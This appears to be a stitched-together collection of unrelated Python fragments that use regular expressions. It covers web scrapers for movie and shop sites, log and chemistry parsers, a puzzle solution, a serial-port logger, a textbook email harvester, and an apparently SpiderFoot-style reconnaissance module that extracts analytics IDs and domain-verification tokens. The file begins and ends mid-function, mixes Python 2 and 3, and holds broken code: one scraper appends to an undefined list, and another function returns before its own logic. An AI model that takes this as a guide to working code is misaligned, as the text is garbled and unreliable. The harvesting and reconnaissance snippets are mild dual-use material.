                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]

            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re.S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]

            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list

    return this_list
def showCovers_adddetail_csfd(self, data, title):
    title_s = re.findall('<title>(.*?)\|', data, re.S)
    if title_s:
        if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
            csfd_title = title_s[0]
        else:
            csfd_title = title
        print "EMC csfd: Movie name - %s" % csfd_title
    else:
        csfd_title = title
    bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
    if bild:
        print "EMC csfd: Cover Select - %s" % title
        self.cover_count = self.cover_count + 1
        csfd_url = "http:" + bild[0].replace('\\', '').strip()
        self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
        self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
        bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
        if bild:
            bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
            if bild1:
                for each in bild1:
                    print "EMC csfd: Cover Select - %s" % title
                    self.cover_count = self.cover_count + 1
                    csfd_url = "http:" + each.replace('\\', '').strip()
                    self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
                    self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
            else:
                print "EMC csfd 3 : no else covers - %s" % title
        else:
            print "EMC csfd 2 : no else covers - %s" % title
    else:
        print "EMC csfd 1 : no info found - %s" % title
def ReadProtonCounts(inchi):
    import re

    # Get inchi layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]

    # initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])

    # Find, save and remove tautomeric portions from main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]

    # Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)

    return protons, formula, tautomerics, fprotons
def getCssLinks(self):
    """Extract the links inside a css file (mainly images and other css files)."""
    f = open(self.file)
    css = f.read()
    f.close()

    def getNewLink(cl):
        up = urlparse(self.url)
        if (not up.path) or ('../' not in cl):
            return cl
        cs = cl.count('../') + 1
        newlink = up.scheme + '://' + up.netloc + '/'.join(up.path.split('/')[:-cs])
        newlink = re.sub(r'(\.\./)+', newlink + '/', cl)
        return newlink

    # image links
    picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
    # other css links
    cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
    Links = picLinks + cssLinks
    cLinks = []
    for cl in Links:
        cLinks.append(getNewLink(cl))
    return cLinks
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()

    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []
    fileName = os.path.basename(log_file)

    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))

    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)

    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []

    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100
        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))
        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)

    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)

    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
def camel_case_match(string):
    """
    Properly matches the camelCase naming style so that a name like
    writeXMLDocument gets parsed as ["write", "XML", "Document"].
    """
    return re.findall('(^[a-z]+|[A-Z][a-z]+|[A-Z]+|[0-9])(?![a-z])', string)
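# Usage sketch with hypothetical identifiers, assuming camel_case_match() above and `re` are in scope:
assert camel_case_match("writeXMLDocument") == ['write', 'XML', 'Document']
assert camel_case_match("parseHTTP2Frames") == ['parse', 'HTTP', '2', 'Frames']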
def parse_google_link(url):
    return url  # now it seems to be ok
    real = re.findall('http[^&]*&', url)[0]
    ret = urllib.unquote(real[:-1])
    return ret
def getImageList(html):
    reg = 'http[^"]*?\.jpg'
    imgre = re.compile(reg)
    imgList = re.findall(imgre, html)
    return imgList
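# Usage sketch with hypothetical HTML, assuming getImageList() above and `re` are in scope:
assert getImageList('<img src="http://example.com/a.jpg"><img src="http://example.com/b.png">') == ['http://example.com/a.jpg']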
def get_number_from_string(string):
    return [float(s) for s in re.findall(r"[-+]?\d*\.\d+|\d+", string)]
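# Usage sketch with a hypothetical string, assuming get_number_from_string() above and `re` are in scope:
assert get_number_from_string("Voltage: -3.5V after 7s") == [-3.5, 7.0]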
# Python for Informatics, Chapter 11, example 6 (page 132, section 11.2)
# Prints out all possible email addresses from a file
# (Anything that is string@string)
import re

hand = open('mbox-short.txt')
for line in hand:
    line = line.rstrip()
    x = re.findall('\S+@\S+', line)
    if len(x) > 0:
        print x
def getArticleDetails(self, articles):
    print("Get Article Details...")
    artdic = {}

    # Define Webdriver
    driver = webdriver.Remote(
        command_executor='http://selenium-hub:4444/wd/hub',
        desired_capabilities=getattr(DesiredCapabilities, "FIREFOX"))
    RemoteConnection.set_timeout(36000)
    url = articles
    driver.get(url)

    # Get source code from page
    htmltext = driver.page_source
    soup = BeautifulSoup(htmltext, "lxml")
    driver.quit()

    # Extract field values and parse them to json / dictionary
    tempdic = {}
    try:
        tempdic['Article_ID'] = soup.find(
            "meta", attrs={"name": "parsely-post-id"})["content"]
    except:
        tempdic['Article_ID'] = "0"
    tempdic['URL'] = url
    tempdic['Title'] = soup.title.string
    tempdic['Author'] = soup.find("meta", attrs={"name": "author"})["content"]

    # Loop to extract clean date
    tempdic['PublishingDate'] = \
        re.findall(r".+?(?=T)", soup.find("meta", property="article:published_time")["content"])[0]

    # Loop to extract no of responses and reading_time
    tempdic['Reading_time'] = re.findall(
        r"[0-9]", soup.find("meta", attrs={"name": "twitter:data1"})["value"])[0]
    try:
        tempdic['No_Responses'] = re.findall(
            r"[0-9]", soup.find("span", "az").string)[0]
    except:
        tempdic['No_Responses'] = 0

    # Loop to extract tags
    li = soup.select("ul > li > a")
    tags = []
    for link in li:
        tags.append(link.string)
    tempdic['Tags'] = tags

    # Loop to extract claps
    btns = soup.find_all("button")
    for button in btns:
        if button.string is None:
            pass
        else:
            try:
                tempdic['Claps'] = (int(button.string))
            except:
                break

    # Loop to get clean text
    pagetext = ""
    text = soup.findAll("p")
    for t in text:
        pagetext += t.getText()

    # Clean special characters and collapse double spaces
    pagetext = (" ".join(re.findall(r"[A-Za-z0-9]*", pagetext))).replace("  ", " ")
    tempdic['Text'] = pagetext

    artdic[url] = tempdic
    return (artdic)
def words(text):
    return re.findall('[a-z]+', text.lower())

DICTIONARY = set(words(file(config.SPELLCHECKER_TEXT).read()))
import re, operator

def update_location(tile, match):
    if match == 'e':
        direction = (2, 0)
    if match == 'se':
        direction = (1, -1)
    if match == 'sw':
        direction = (-1, -1)
    if match == 'w':
        direction = (-2, 0)
    if match == 'nw':
        direction = (-1, 1)
    if match == 'ne':
        direction = (1, 1)
    return tuple(map(operator.add, tile, direction))

flipped = set()
tiles = [line for line in open('input.txt').read().strip().split('\n')]
for tile in tiles:
    loc = (0, 0)
    matches = re.findall(r'(e|se|sw|w|nw|ne)', tile)
    for match in matches:
        loc = update_location(loc, match)
    if loc not in flipped:
        flipped.add(loc)
    else:
        flipped.remove(loc)
print(len(flipped))
import csv
import re

import serial

x_val = 0
y_ch1 = 0
y_ch2 = 0
fieldnames = ["x_val", "y_ch1", "y_ch2"]

ser = serial.Serial()
ser.baudrate = 9600
ser.port = 'COM3'
ser.open()
print("Is open:", ser.is_open)

with open('data.csv', 'w') as csv_file:
    csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
    csv_writer.writeheader()

while True:
    with open('data.csv', 'a') as csv_file:
        csv_writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
        channel1 = ser.readline()
        channel2 = ser.readline()
        res_ch1 = re.findall(r'\d+', str(channel1))
        res_ch2 = re.findall(r'\d+', str(channel2))
        y_ch1 = int(res_ch1[1])
        y_ch2 = int(res_ch2[1])
        print(int(res_ch1[0]), int(res_ch1[1]))
        print(int(res_ch2[0]), int(res_ch2[1]))
        info = {"x_val": x_val, "y_ch1": y_ch1, "y_ch2": y_ch2}
        csv_writer.writerow(info)
        x_val += 1
def get_md5_file_name(file_path):
    file_name = os.path.basename(file_path)
    return re.findall(r"([a-fA-F\d]{32})", file_name)[0]
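# Usage sketch with a hypothetical path, assuming get_md5_file_name() above plus `os` and `re` are in scope:
assert get_md5_file_name('/tmp/d41d8cd98f00b204e9800998ecf8427e.png') == 'd41d8cd98f00b204e9800998ecf8427e'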
def toCamelCase(line):
    # Splits a CamelCase string into its component words.
    return re.findall(r'[A-Z](?:[a-z]+|[A-Z]*(?=[A-Z]|$))', line)
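# Usage sketch with a hypothetical identifier, assuming toCamelCase() above and `re` are in scope:
assert toCamelCase('HTTPResponseCode') == ['HTTP', 'Response', 'Code']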
def process_text(doc_id, text):
    global tokens_count
    global title_file
    tokens = []
    links = []
    info_box = []
    body = []
    categories = []
    references = []

    # Convert to lower text
    text = text.lower()

    css = re.compile(r'{\|(.*?)\|}', re.DOTALL)
    cite = re.compile(r'{{v?cite(.*?)}}', re.DOTALL)
    files = re.compile(r'\[\[file:(.*?)\]\]', re.DOTALL)
    urls = re.compile(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', re.DOTALL)
    # junk = re.compile(r"[~`!@#$%-^*+{\[}\]\|\\<>/?]",re.DOTALL)

    # Categories
    catRegExp = r'\[\[category:(.*?)\]\]'
    categories = re.findall(catRegExp, text, flags=re.MULTILINE)
    categories = ' '.join(categories)
    #categories = junk.sub(' ',categories)
    # categories = categories.split()
    tokenList = re.split(r'[^A-Za-z0-9]+', categories)
    for word in tokenList:
        if len(word) > 1:
            add_to_invereted_index(word, doc_id, "c")

    # Infobox
    infoRegExp = r'{{infobox(.*?)}}'
    info_box = re.findall(infoRegExp, text, re.DOTALL)
    for infoList in info_box:
        tokenList = []
        tokenList = re.findall(r'=(.*?)\|', infoList, re.DOTALL)
        tokenList = ' '.join(tokenList)
        #tokenList = junk.sub(' ',tokenList)
        # tokenList = tokenList.split()
        tokenList = re.split(r'[^A-Za-z0-9]+', tokenList)
        for word in tokenList:
            if len(word) > 1:
                add_to_invereted_index(word, doc_id, "i")

    # References
    refRegExp = r'== ?references ?==(.*?)=='
    references = re.findall(refRegExp, text, flags=re.DOTALL)
    references = ' '.join(references)
    # print(references)
    #references = junk.sub(' ',references)
    # references = references.split()
    words = re.split(r'[^A-Za-z0-9]+', references)
    for word in words:
        if len(word) > 1:
            add_to_invereted_index(word, doc_id, "r")

    # External Links
    ei = 0
    ci = len(text)
    try:
        ei = text.index('=external links=') + 20
        ci = text.index('[[category:') + 20
    except:
        pass
    links = text[ei:ci]
    links = re.findall(r'\[(.*?)\]', text, flags=re.MULTILINE)
    links = ' '.join(links)
    #links = junk.sub(' ',links)
    # links = links.split()
    words = re.split(r'[^A-Za-z0-9]+', links)
    for word in words:
        if len(word) > 1:
            add_to_invereted_index(word, doc_id, "e")

    # Body
    text = urls.sub('', text)
    text = cite.sub('', text)
    text = files.sub('', text)
    text = css.sub('', text)
    # text = junk.sub(' ',text)
    # text = remove_punctuation(text)
    words = re.split(r'[^A-Za-z0-9]+', text)
    tokens_count += len(words)
    title_file.write(str(len(words)) + "\n")
    # words = text.split()
    for word in words:
        if len(word) > 1 and len(word) < 46:
            add_to_invereted_index(word, doc_id, "b")
def handleEvent(self, event):
    eventName = event.eventType
    srcModuleName = event.module
    eventData = event.data

    sourceData = self.sf.hashstring(eventData)
    if sourceData in self.results:
        self.sf.debug(f"Skipping {eventData}, already checked.")
        return None
    self.results[sourceData] = True

    self.sf.debug(f"Received event, {eventName}, from {srcModuleName}")

    if event.moduleDataSource:
        datasource = event.moduleDataSource
    else:
        datasource = "Unknown"

    if eventName == 'TARGET_WEB_CONTENT':
        # Google Analytics
        matches = re.findall(r"\bua\-\d{4,10}\-\d{1,4}\b", eventData, re.IGNORECASE)
        for m in matches:
            if m.lower().startswith('ua-000000-'):
                continue
            if m.lower().startswith('ua-123456-'):
                continue
            if m.lower().startswith('ua-12345678'):
                continue
            self.sf.debug("Google Analytics match: " + m)
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Analytics: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Google AdSense
        matches = re.findall(r"\b(pub-\d{10,20})\b", eventData, re.IGNORECASE)
        for m in matches:
            if m.lower().startswith('pub-12345678'):
                continue
            self.sf.debug("Google AdSense match: " + m)
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google AdSense: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Google Website Verification
        # https://developers.google.com/site-verification/v1/getting_started
        matches = re.findall(r'<meta name="google-site-verification" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
        for m in matches:
            self.sf.debug("Google Site Verification match: " + m)
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        matches = re.findall(r'<meta name="verify-v1" content="([a-z0-9\-\+_=]{43,44})"', eventData, re.IGNORECASE)
        for m in matches:
            self.sf.debug("Google Site Verification match: " + m)
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Quantcast
        if '_qevents.push' in eventData:
            matches = re.findall(r"\bqacct:\"(p-[a-z0-9]+)\"", eventData, re.IGNORECASE)
            for m in matches:
                self.sf.debug("Quantcast match: " + m)
                evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Quantcast: " + m, self.__name__, event)
                evt.moduleDataSource = datasource
                self.notifyListeners(evt)

        # Ahrefs Site Verification
        matches = re.findall(r'<meta name="ahrefs-site-verification" content="([a-f0-9]{64})"', eventData, re.IGNORECASE)
        for m in matches:
            self.sf.debug("Ahrefs Site Verification match: " + m)
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Ahrefs Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

    if eventName == 'DNS_TEXT':
        # Google Website Verification
        # https://developers.google.com/site-verification/v1/getting_started
        matches = re.findall(r'google-site-verification=([a-z0-9\-\+_=]{43,44})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Google Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # LogMeIn Domain Verification
        # https://support.logmeininc.com/openvoice/help/adding-a-txt-record-to-a-dns-server-ov710011
        matches = re.findall(r'logmein-domain-confirmation ([A-Z0-9]{24})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "LogMeIn Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        matches = re.findall(r'logmein-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "LogMeIn Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # DocuSign Domain Verification
        # https://support.docusign.com/en/guides/org-admin-guide-domains
        matches = re.findall(r'docusign=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "DocuSign Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # GlobalSign Site Verification
        # https://support.globalsign.com/customer/en/portal/articles/2167245-performing-domain-verification---dns-txt-record
        matches = re.findall(r'globalsign-domain-verification=([a-z0-9\-\+_=]{42,44})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "GlobalSign Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Atlassian Domain Verification
        # https://confluence.atlassian.com/cloud/verify-a-domain-for-your-organization-873871234.html
        matches = re.findall(r'atlassian-domain-verification=([a-z0-9\-\+\/_=]{64})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Atlassian Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Adobe IDP Site Verification
        # https://helpx.adobe.com/au/enterprise/using/verify-domain-ownership.html
        matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe IDP Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        matches = re.findall(r'adobe-idp-site-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe IDP Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Adobe Domain Verification
        # https://helpx.adobe.com/sign/help/domain_claiming.html
        matches = re.findall(r'adobe-sign-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Adobe Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Stripe Domain Verification
        # https://stripe.com/docs/apple-pay/web#going-live
        matches = re.findall(r'stripe-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Stripe Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # TeamViewer SSO Verification
        # https://community.teamviewer.com/t5/Knowledge-Base/Single-Sign-On-SSO/ta-p/30784
        matches = re.findall(r'teamviewer-sso-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "TeamViewer SSO Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Aliyun Site Verification
        matches = re.findall(r'aliyun-site-verification=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Aliyun Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Facebook Domain Verification
        # https://developers.facebook.com/docs/sharing/domain-verification/
        matches = re.findall(r'facebook-domain-verification=([a-z0-9]{30})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Facebook Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Citrix Domain Verification
        matches = re.findall(r'citrix-verification-code=([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Citrix Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Dropbox Domain Verification
        # https://help.dropbox.com/teams-admins/admin/domain-insights-account-capture#verify
        matches = re.findall(r'dropbox-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Dropbox Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Detectify Domain Verification
        # https://support.detectify.com/customer/en/portal/articles/2836806-verification-with-dns-txt-
        matches = re.findall(r'detectify-verification=([a-f0-9]{32})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Detectify Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Drift Domain Verification
        matches = re.findall(r'drift-verification=([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Drift Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Ahrefs Site Verification
        # https://help.ahrefs.com/en/articles/1431155-how-do-i-finish-crawling-my-website-faster-in-site-audit
        matches = re.findall(r'ahrefs-site-verification_([a-f0-9]{64})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Ahrefs Site Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Statuspage.io Domain Verification
        # https://help.statuspage.io/help/domain-ownership
        matches = re.findall(r'status-page-domain-verification=([a-z0-9]{12})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Statuspage Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Zoom.us Domain Verification
        # https://support.zoom.us/hc/en-us/articles/203395207-What-is-Managed-Domain-
        matches = re.findall(r'ZOOM_verify_([a-z0-9\-\+\/_=]{22})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Zoom.us Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Mail.ru Domain Verification
        matches = re.findall(r'mailru-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Mail.ru Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Yandex Domain Verification
        matches = re.findall(r'yandex-verification: ([a-z0-9]{16})$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Yandex Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Brave Ledger Verification
        # https://support.brave.com/hc/en-us/articles/360021408352-How-do-I-verify-my-channel-
        matches = re.findall(r'brave-ledger-verification=([a-z0-9]+)$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Brave Ledger Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # have-i-been-pwned Verification
        matches = re.findall(r'have-i-been-pwned-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "have-i-been-pwned Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

        # Cisco Live Domain Verification
        # https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2016/pdf/TECCOL-2982.pdf
        matches = re.findall(r'cisco-ci-domain-verification=([a-f0-9]+)$', eventData.strip(), re.IGNORECASE)
        for m in matches:
            evt = SpiderFootEvent("WEB_ANALYTICS_ID", "Cisco Live Domain Verification: " + m, self.__name__, event)
            evt.moduleDataSource = datasource
            self.notifyListeners(evt)

    return None
def __parse_metadata_field(data: str) -> Dict[str, str]:
    metadata = {}
    for (_, key, value) in re.findall(r"<(xmp|pdfx|pdf|xmpMM):(.+)>(.+)</\1:\2>", data, re.I):
        metadata[key] = value
    return metadata
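# Usage sketch with a hypothetical XMP/PDF tag, assuming __parse_metadata_field() above,
# `re`, and `from typing import Dict` are in scope:
assert __parse_metadata_field('<pdf:Producer>pdfTeX-1.40</pdf:Producer>') == {'Producer': 'pdfTeX-1.40'}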
if result:
    base_sign = base_signs.format(i)
    try:
        driver.find_element_by_xpath(base_sign).click()
    except Exception:
        print("Record " + str(count) + " timed out, trying to reconnect")
        driver.find_element_by_xpath(base_sign).click()
    sleep(1)
    all_hand = driver.window_handles
    driver.switch_to.window(all_hand[-1])
    html = driver.page_source
    shop_name = driver.find_element_by_xpath('//h2').text
    shop_tel = ''.join(re.findall(r'客服电话:(.*?)</p>', html))
    shop_address = ''.join(re.findall(r'联系地址:(.*?)</p>', html))
    result = cursor.execute(sql_shop, [shop_name, shop_tel, shop_address])
    client.commit()
    if result:
        print("Successfully added " + str(num) + " records")
        num += 1
    driver.close()
    driver.switch_to.window(all_hand[0])
    print("Finished collecting page " + str(page))
    # if goods_salas < 5:
    #     print("Daily sales below 5, stop searching")
def youkumovies():
    flag = 0
    boo = False
    countsum = 0
    lg = {
        '内地': '普通话',
        '韩国': '韩语',
        '美国': '英语',
        '俄罗斯': '俄语',
        '比利时': '比利时语',
        '香港': '粤语',
        '台湾': '台语',
        '日本': '日语',
        '其他': '其他',
        '泰国': '泰语',
        '欧洲': '英语',
        '印度': '印度语',
        '英国': '英语',
        '中国': '普通话'
    }
    url = 'http://list.youku.com/category/show/c_96_s_6_d_1_p_%d.html?spm=a2h1n.8251845.0.0'
    for ii in range(0, 29):
        flag += 1
        sum = 0
        print('.......................... adding page %d ..........................' % (flag))
        page = url % (ii)
        req = requests.get(page)
        soup = BeautifulSoup(req.text, 'lxml')
        html = soup.find_all(class_='yk-col4 mr1')
        for n in html:
            sum += 1
            countsum += 1
            print('>>>>>>>>>>>>>>>>>>>>>>> %d items extracted in total so far <<<<<<<<<<<<<<<<<<<<<<<' % (countsum))
            print('--------------------- adding page %d, item %d ------------------------' % (flag, sum))
            if countsum >= 685:
                new_str = str(n)
                new_str = BeautifulSoup(new_str, 'lxml')
                html_str = str(new_str.find_all(class_='p-thumb')[0])
                # print(html_str)
                try:
                    info = re.findall('class="p-thumb"><a href="(.*?)" target="_blank"', html_str, re.S)
                except IndexError as e:
                    info.append('')
                try:
                    info.append(re.findall('target="_blank" title="(.*?)"></a>', html_str, re.S)[0].replace('\xa0', ''))
                except IndexError as e:
                    info.append('')
                try:
                    info.append(re.findall('</div><img _src="(.*?)" alt="', html_str, re.S)[0])
                except IndexError as e:
                    info.append('')
                try:
                    info.append(re.findall('<span class="vip-free">(.*?)</span>', html_str, re.S)[0])
                except IndexError as e:
                    info.append('')
                if not ('预告' in info[3]):
                    if (len(Movies.objects.filter(moviesname=info[1])) < 1):
                        dan_req = requests.get('http:' + info[0])
                        new_html = dan_req.text.replace('\\n', '').replace('\n', '').replace('\\', '')
                        try:
                            dan_url = 'https:' + re.findall('class="bg-dubo"></span> <a href="(.*?)" target="_blank"', new_html, re.S)[0]
                        except IndexError as e:
                            dan_url = 'https://www.baidu.com'
                        req = requests.get(dan_url)
                        y_html = BeautifulSoup(req.text, 'lxml')
                        try:
                            html_s = str(y_html.find_all(class_='p-base')[0])
                            tv_time = re.findall('<label>上映:</label>(.*?)</span></li>', html_s, re.S)[0]
                            info.append(tv_time)
                        except IndexError as e:
                            info.append('')
                            html_s = ''
                        try:
                            tv_di = re.findall('</li><li>地区:.*target="_blank">(.*?)</a></li><li>类型:', html_s, re.S)[0]
                            info.append(tv_di)
                        except IndexError as e:
                            info.append('')
                            tv_di = '其他'
                        try:
                            info.append(lg[tv_di])
                        except KeyError as e:
                            info.append('')
                        try:
                            lei_s = re.findall('</a></li><li>类型:<a(.*?)</li><li>', html_s, re.S)[0]
